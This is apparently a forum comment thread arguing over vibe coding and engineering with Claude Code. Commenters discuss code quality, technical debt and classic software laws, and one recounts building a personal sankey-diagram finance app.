Both of these camps are the loudest voices on the internet, but there is a quiet but extremely productive camp somewhere in the middle that has enough optimism, open mindedness along with years of experience as an engineer to push Claude Code to its limit.
I read somewhere that the difference between vibe coding and "agentic engineering" is if you are able to know what the code does. Developing a complex website with claude code is not very different than managing a team of off shore developers in terms of risks.
Unless you are writing software for medical devices, banking software, fighter jets, etc... you are doing a disservice to your career by actively avoiding using LLMs as a tool in developing software.
I have used around $2500 in claude code credits (measured with
bunx ccusage) the last 6 months, and 95% of what was written is never going to run on someone else's computer, yet I have been able to get ridiculous value out of it.Disruption happens when firms are disincentivized to switch to the new thing or address the new customer because the current state of it is bad, the margins are low. Intel missed out on mobile because their existing business was so excellent and making phone chips seemed beneath them.
The funny thing is that these firms are being completely rational. Why leave behind high margins and your excellent full-featured product for this half-working new paradigm?
But then eventually, the new thing becomes good enough and overtakes the old one. Going back to the Intel example, they felt this acutely when Apple switched their desktops to ARM.
For now, Claude Code works. It's already good enough. But unless we've plateaued on AI progress, it'll surpass hand crafted equivalents on most metrics.
Consider this overly simplified process of writing a logic to satisfy a requirement:
1. Write code
2. Verify
3. Fix
We, humans, know the cost of each step is high, so we come up various way to improve code quality and reduce cognitive burden. We make it easier to understand when we have to revisit.
On the other hand, LLMs can understand** a large piece of code quickly***, and in addition, compile and run with agentic tools like Claude Code at the cost of token****. Quality does not matter to vibe coders if LLMs can fill the function logic that satisfies the requirement by iterating the aforementioned steps quickly.
I don't agree with this approach and have seen too many things broken from vibe code, but perhaps they are right as LLMs get better.
* Anecdotal
** I see LLM as just a probabilistic function so it doesn't "reason" like humans do. It's capable of highly advanced problem solving yet it also fails at primitive task.
*** Relative to human
**** Cost of token I believe is relatively cheaper compared to a full-time engineer and it'll get cheaper over time.
Also, to those who say "this is proof that code quality doesn't matter any more", let's have this chat 5 years from now when they're crumbling under the weight of their own technical debt :)
> Then I explain what I think should be done and we’ll keep discussing it until I stop having more thoughts to give and the machine stops saying stupid things which need correcting.
Users like the author must be the most valuable Claude asset, because AI itself isn't a product — people's feedback that shapes output is.
There's nothing wrong with saying that Claude Code is written shoddily. It definitely is. But I think it should come with the recognition that Anthropic achieved all of its goals despite this. That's pretty interesting, right? I'd love to be talking about that instead.
want code that isn't shit? embrace a coding paradigm and stick to it without flip-flopping and sticking your toe into every pond, use a good vcs, and embrace modularity and decomposability.
the same rules when 'writing real code'.
9/10 times when I see an out-of-control vibe coded project it sorta-kinda started as OOP before sorta-kinda trying to be functional and so on. You can literally see the trends change mid-code. That would produce shit regardless of what mechanism used such methods, human/llm/alien/otherwise.
> In this particular case, a human could have told the machine: “There’s a lot of things that are both agents and tools. Let’s go through and make a list of all of them, look at some examples, and I’ll tell you which should be agents and which should be tools. We’ll have a discussion and figure out the general guidelines. Then we’ll audit the entire set, figure out which category each one belongs in, port the ones that are in the wrong type, and for the ones that are both, read through both versions and consolidate them into one document with the best of both.”
But that isn't the hard part. The hard part is that some people are using the tool versions and some are using the agent versions, so consolidating them one way or another will break someone's workflow, and that incurs a real actual time cost, which means this is now a ticket that needs to be prioritized and scheduled instead of being done for free.
Once you have learned enough from playing with sand castles, you can start over to build real castles with real bricks (and steel if you want to build skyscraper). Then it is your responsibility to make sure that they would not collapse when people move it.
> So pure vibe coding is a myth. But they’re still trying to do it, and this leads to some very ridiculous outcomes
creating a product in a span of mere months that millions of developers use everday is opposite of ridiculous. we wouldn't even have known about the supposed ridiculousness of code if it hadnt leaked.
- Brooks' No Silver Bullet: no single technology or management technique will yield a 10-fold productivity improvement in software development within a decade. If we write a spec that details everything we want, we would write soemthing as specific as code. Currently people seem to believe that a lot of the fundamentals are well covered by existing code, so a vague lines of "build me XXX with YYY" can lead to amazing results because AI successfully transfers the world-class expertise of some engineers to generate code for such prompt, so most of the complex turns to be accidental, and we only need much fewer engineers to handle essential complexities.
- Kernighan's Law, which says debugging is twice as hard as writing the code in the first place. Now people are increasingly believing that AI can debug way faster than human (most likely because other smart people have done similar debugging already). And in the worst case, just ask AI to rewrite the code.
- Dijkstra on the foolishness of programming in natural language. Something along the line of which a system described in natural language becomes exponentially harder to manage as its size increases, whereas a system described in formal symbols grows linearly in complexity relative to its rules. Similar to above, people believe that the messiness of natural language is not a problem as long as we give detailed enough instructions to AI, while letting AI fills in the gaps with statistical "common sense", or expertise thereof.
- Lehman’s Law, which states that a system's complexity increases as it evolves, unless work is done to maintain or reduce it. Similar to above, people start to believe otherwise.
- And remotely Coase's Law, which argues that firms exist because the transaction costs of using the open market are often higher than the costs of directing that same work internally through a hierarchy. People start to believe that the cost of managing and aligning agents is so low that one-person companies that handle large number of transactions will appear.
Also, ultimately Jevons Paradox, as people worry that the advances in AI will strip out so much demand that the market will slash more jobs than it will generate. I think this is the ultimate worry of many software engineers. Luddites were rediculed, but they were really skilled craftsmen who spent years mastering the art of using those giant 18-pound shears. They were the staff engineers of the 19th-century textile world. Mastering those 18-pound shears wasn't just a job but an identity, a social status, and a decade-long investment in specialized skills. Yeah, Jevons Paradox may bring new jobs eventually, but it may not reduce the blood and tears of the ordinary people.
Intereting times.
AI naysayers are heavily incentivized to find fault with it, but in my experience it's pretty rare to see a codebase of that size where it's not easy to pick out "bad code" examples.
Are there any relatively neutral parties who've evaluated the code and found it to be obviously junk?
The ship has sailed. Vibe coding works. It will only work better in the future.
I have been programming for decades now, I have managed teams of developers. Vibe coding is great, specially in the hands of experts that know what they are doing.
Deal with it because it is not going to stop. In the near future it will be local and 100x faster.
"I have been screaming at my computer this past week dealing with a library that was written by overpaid meatbags with no AI help."
And here we go: The famous "humans do it, too" argument. With the gratuitous "meatbag" propaganda.
Look Bram, if you work on bitcoin bullshit startups, perhaps AI is good enough for you. No one will care.
In the past, which is a different country, we would throw away the prototypes.
Nowadays vibe coding just keeps adding to them.
memory created!
And then you have the source code for quake or doom.
So I set out to build an app with CC just to see what it's like. I currently use Copilot (copilot.money) to track my expenditures, but I've become enamored with sankey diagrams. Copilot doesn't have this charting feature, so I've been manually exporting all my transactions and massaging them in the sankey format. It's a pain in the butt, error prone, and my python skills are just not good enough to create a conversion script. So I had CC do it. After a few minutes of back and forth, it was working fine. I didn't care about spaghetti code at all.
So next I thought, how about having it generate the sankey diagrams (instead of me using sankeymatic's website). 30 minutes later, it had a local website running that was doing what I had been manually doing for months.
Now I was hooked. I started asking it to build a native GUI version (for macOS) and it dutifully cranked out a version using pyobjC etc. After ironing out a few bugs it was usable in less than 30 min. Feature adds consumed all my tokens for the day and the next day I was brimming with changes. Burned through that days tokens as well and after 3 days (I'm on the el cheapo plan), I have an app that basically does what I want in a reasonable attractive, and accurate manner.
I have no desire to look at the code. The size is relatively small, and resource usage is small as well. But it solved this one niche problem that I never had the time or skill to solve.
Is this a good thing? Will I be downvoted to oblivion? I don't know. I'm very very concerned about the long term impact of LLMs on society, technology and science. But it's very interesting to see the other side of what people are claiming.
2024 - Utter Trash
2025 - Merely hotdog water
2026 - Aaaaaaaaaactually pretty good...
Every forward-leaning platform is building out an MCP interface, I think we're past the point of "soulless fad."
> You don’t have to have poor quality software just because you’re using AI for coding.
People were given faster typers with incredible search capabilities and decided quality doesn’t matter anymore.
I don’t even mean the code. The product quality is noticeably sub par with so many vibe-coded projects.
All this to say, Vibe Coding as a no-code, even if the solution can hook api's for you, etc, nah. It should be a gateway at best to fully understand and build via agentic development.